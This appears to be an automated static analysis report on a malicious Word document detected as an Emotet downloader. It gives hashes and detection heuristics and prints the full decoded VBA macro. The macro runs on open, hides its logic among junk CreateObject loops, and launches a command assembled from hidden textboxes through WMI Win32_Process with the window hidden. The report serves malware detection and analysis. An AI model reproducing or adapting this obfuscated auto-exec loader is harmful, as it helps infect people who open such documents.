Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 6273492f7425010a…

MALICIOUS

Office (OLE)

136.8 KB Created: 2019-05-15 07:34:00 Authoring application: Microsoft Office Word First seen: 2020-05-14
MD5: 28d038b8af4c15606af45f46288044ab SHA-1: ec2f0e61f236865b5ea16aa610775ff5bebbaec5 SHA-256: 6273492f7425010ac115b511226334f85378b15d21cf49e27e8ab35503a55adf
350 Risk Score

Heuristics 10

  • ClamAV: Doc.Downloader.Emotet-10001946-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.Emotet-10001946-0
  • VBA macros detected medium 6 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • VBA WMI Win32_Process launcher critical OLE_VBA_WMI_PROCESS_CREATE
    VBA macro builds or references a WMI moniker for Win32_Process and invokes .Create to start a command. This is a high-confidence macro execution chain that often hides the WMI class name through string concatenation or helper functions.
    Matched line in script
                CreateObject ("M950421")
  • Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER
    Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
    Matched line in script
                CreateObject ("M950421")
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
                CreateObject ("M950421")
  • GetObject call high OLE_VBA_GETOBJ
    GetObject call
    Matched line in script
    Set z36470 = c1690793(GetObject(CVar("winmgmts:Win32_Process")))
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Triggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
  • AutoOpen macro low OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script
    autoopen()
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 10281 bytes
SHA-256: 743a7e7dfda2a2565e8fdd26c867834f9c33c3ccf41cdf93f56e900b90fe151f
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "j052640"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Control = "n2581304, 0, 0, MSForms, TextBox"
Attribute VB_Control = "b_0376, 1, 1, MSForms, TextBox"
Attribute VB_Control = "f616817, 2, 2, MSForms, TextBox"
Attribute VB_Control = "A64818, 3, 3, MSForms, TextBox"
Attribute VB_Control = "c_0237_4, 4, 4, MSForms, TextBox"
Attribute VB_Control = "C_4934_0, 5, 5, MSForms, TextBox"

Attribute VB_Name = "u6446562"

Attribute VB_Name = "k6471_8"

Attribute VB_Name = "Y5513012"

Attribute VB_Name = "Q12543"

Attribute VB_Name = "k67426_"

Attribute VB_Name = "b001947"

Attribute VB_Name = "r3273_"
Function c1690793(h292409)
   While C53_587 And D081842
            CreateObject ("M950421")
            CreateObject ("z5578801")
            CreateObject ("231383114")
            CreateObject ("213146393")
            CreateObject ("f107038")
Wend
   While P0_58471 And Q52906
            CreateObject ("j25_87")
            CreateObject ("I861_8")
            CreateObject ("483619105")
            CreateObject ("688624756")
            CreateObject ("P0737212")
Wend
   While j43773 And z818476_
            CreateObject ("w7_369_0")
            CreateObject ("z56819")
            CreateObject ("706577816")
            CreateObject ("343803285")
            CreateObject ("P__5__95")
Wend
Set c1690793 = CVar(h292409)
   While X2_54143 And v82302_
            CreateObject ("b9020_5")
            CreateObject ("v137156")
            CreateObject ("560909251")
            CreateObject ("777227899")
            CreateObject ("o2667707")
Wend
   While F83_70 And J07534
            CreateObject ("M247284")
            CreateObject ("C168_02_")
            CreateObject ("5610351")
            CreateObject ("963416791")
            CreateObject ("I22682")
Wend
   While q675499 And i083960
            CreateObject ("D92722")
            CreateObject ("U085700")
            CreateObject ("510324829")
            CreateObject ("550402930")
            CreateObject ("i89530")
Wend
End Function
Sub _
 _
 _
autoopen()
On Error Resume Next
   While f41960 And w03508
            CreateObject ("I2731497")
            CreateObject ("K9_908_")
            CreateObject ("428548477")
            CreateObject ("355109480")
            CreateObject ("q6083913")
Wend
   While S409_350 And p37303
            CreateObject ("v88_801")
            CreateObject ("J00123")
            CreateObject ("857831959")
            CreateObject ("592303265")
            CreateObject ("J47206")
Wend
f36620
   While q89012 And r5958_
            CreateObject ("D_692484")
            CreateObject ("k06017")
            CreateObject ("677609100")
            CreateObject ("931606268")
            CreateObject ("i27826")
Wend
   While z7611852 And t1014709
            CreateObject ("E13633")
            CreateObject ("M7_78_1")
            CreateObject ("800206652")
            CreateObject ("235991737")
            CreateObject ("u_33526")
Wend
   While S6627_2 And H002448
            CreateObject ("l01278")
            CreateObject ("Z3367643")
            CreateObject ("150489629")
            CreateObject ("789683960")
            CreateObject ("Y3__8196")
Wend
End Sub


Attribute VB_Name = "T10276"
Function f36620()
On Error Resume Next
   While A944561 And Z52565
            CreateObject ("Y7427961")
            CreateObject ("i5_617")
            CreateObject ("510837001")
            CreateObject ("217796745")
            CreateObject ("U026_4_5")
Wend
   While z8647351 And n21719
            CreateObject ("w4765347")
            CreateObject ("u2_19009")
            CreateObject ("333769331")
            CreateObject ("749270997")
            CreateObject ("r46_2_")
Wend
   While L02617 And j0539253
            CreateObject ("f3_31698")
            CreateObject ("k938_0")
            CreateObject ("968909467")
            CreateObject ("365247816")
            CreateObject ("a759445")
Wend
J57944 = j052640.C_4934_0 + j052640.b_0376 + j052640.C_4934_0 + j052640.f616817 + j052640.C_4934_0 + j052640.C_4934_0 + j052640.A64818 + j052640.C_4934_0 + j052640.C_4934_0 + j052640.c_0237_4 + j052640.C_4934_0 + j052640.n2581304 + j052640.C_4934_0
   While h17136_ And F8488805
            CreateObject ("k3058313")
            CreateObject ("k990434")
            CreateObject ("641411210")
            CreateObject ("763234801")
            CreateObject ("b_6_16")
Wend
   While F5964_ And O412822
            CreateObject ("z83086")
            CreateObject ("k531858")
            CreateObject ("362066484")
            CreateObject ("442434013")
            CreateObject ("d870335")
Wend
Set z36470 = c1690793(GetObject(CVar("winmgmts:Win32_Process")))
   While q576__42 And c4829571
            CreateObject ("h581025")
            CreateObject ("h5679682")
            CreateObject ("787795292")
            CreateObject ("610506192")
            CreateObject ("Y_5975")
Wend
   While l846182 And M523151
            CreateObject ("L66298")
            CreateObject ("b__2752")
            CreateObject ("876262853")
            CreateObject ("517602965")
            CreateObject ("A80426")
Wend
z36470.Create B9963571 + J57944 + z70732_, z_56390, w734090, I4750_5
   While i4734_80 And I3903802
            CreateObject ("a856067")
            CreateObject ("f514892")
            CreateObject ("612882573")
            CreateObject ("637978611")
            CreateObject ("O346795")
Wend
   While R5443759 And F33945_
            CreateObject ("f883_6_8")
            CreateObject ("L9043881")
            CreateObject ("940702714")
            CreateObject ("959123768")
            CreateObject ("V44141")
Wend
   While i_6049 And U65842
            CreateObject ("l50_17")
            CreateObject ("C00_4200")
            CreateObject ("633505917")
            CreateObject ("817515921")
            CreateObject ("J82404")
Wend
End Function

Attribute VB_Name = "i44961"

Public Function w734090()
   While J008801_ And i335466
            CreateObject ("R_85255")
            CreateObject ("f44297")
            CreateObject ("43115074")
            CreateObject ("986732797")
            CreateObject ("U63022")
Wend
   While f000505 And G0_1_0
            CreateObject ("N83732")
            CreateObject ("p93942")
            CreateObject ("218665834")
            CreateObject ("144606646")
            CreateObject ("M3959_44")
Wend
   While C72831_1 And R099_58
            CreateObject ("G0955347")
            CreateObject ("I1_4100")
            CreateObject ("728645759")
            CreateObject ("758835993")
            CreateObject ("j540721")
Wend
Set w734090 = c1690793(GetObject(CVar("winmgmts:Win32_ProcessStartup")))
   While C009380 And o712129
            CreateObject ("X379__")
            CreateObject ("N643952")
            CreateObject ("493885488")
            CreateObject ("227283560")
            CreateObject ("b58240_")
Wend
   While q9999_8 And F392790
            CreateObject ("z51_5726")
            CreateObject ("a73576")
            CreateObject ("328081271")
            CreateObject ("146380880")
            CreateObject ("P69599_")
Wend
   While t76070 And c554884
            CreateObject ("V87723")
            CreateObject ("u95016")
            CreateObject ("251263640")
            CreateObject ("159975741")
            CreateObject ("k7812_17")
Wend
n908_9_ = vbError - vbError
   While O35378_1 And z924308
            CreateObject ("d0209874")
            CreateObject ("Z5_6330")
            CreateObject ("122650399")
            CreateObject ("524931456")
            CreateObject ("h197903")
Wend
   While k2_402 And E8984130
            CreateObject ("q91033")
            CreateObject ("m69822")
            CreateObject ("89976527")
            CreateObject ("41375022")
            CreateObject ("U4_324")
Wend
With w734090
   While B0_00384 And t960470
            CreateObject ("k2954111")
            CreateObject ("W25358")
            CreateObject ("267743603")
            CreateObject ("860863218")
            CreateObject ("n7819_")
Wend
   While r503425 And L5570204
            CreateObject ("A3_34598")
            CreateObject ("K5537218")
            CreateObject ("65728174")
            CreateObject ("708463808")
            CreateObject ("I90611")
Wend
. _
ShowWindow = n908_9_ + n908_9_ + n908_9_ + n908_9_ + n908_9_ + n908_9_ + n908_9_
   While j503_17 And c3458235
            CreateObject ("l009460")
            CreateObject ("t056179")
            CreateObject ("812666603")
            CreateObject ("926028968")
            CreateObject ("t_4468")
Wend
   While o98243 And r1149435
            CreateObject ("z2016093")
            CreateObject ("i79422_1")
            CreateObject ("673353660")
            CreateObject ("52144376")
            CreateObject ("t6528860")
Wend
   While K7582086 And O2755120
            CreateObject ("X83621")
            CreateObject ("q55__663")
            CreateObject ("705363984")
            CreateObject ("932618134")
            CreateObject ("h291_08")
Wend
End With
   While Q22_61 And h2218987
            CreateObject ("I8503478")
            CreateObject ("j286432")
            CreateObject ("964493506")
            CreateObject ("386471797")
            CreateObject ("N0972345")
Wend
   While J973_117 And c63993
            CreateObject ("F5941692")
            CreateObject ("M6_0_23")
            CreateObject ("714426587")
            CreateObject ("929776296")
            CreateObject ("K94523_1")
Wend
   While E469809 And j839574
            CreateObject ("I15075")
            CreateObject ("V295214")
            CreateObject ("88903188")
            CreateObject ("314176008")
            CreateObject ("h4632670")
Wend
End Function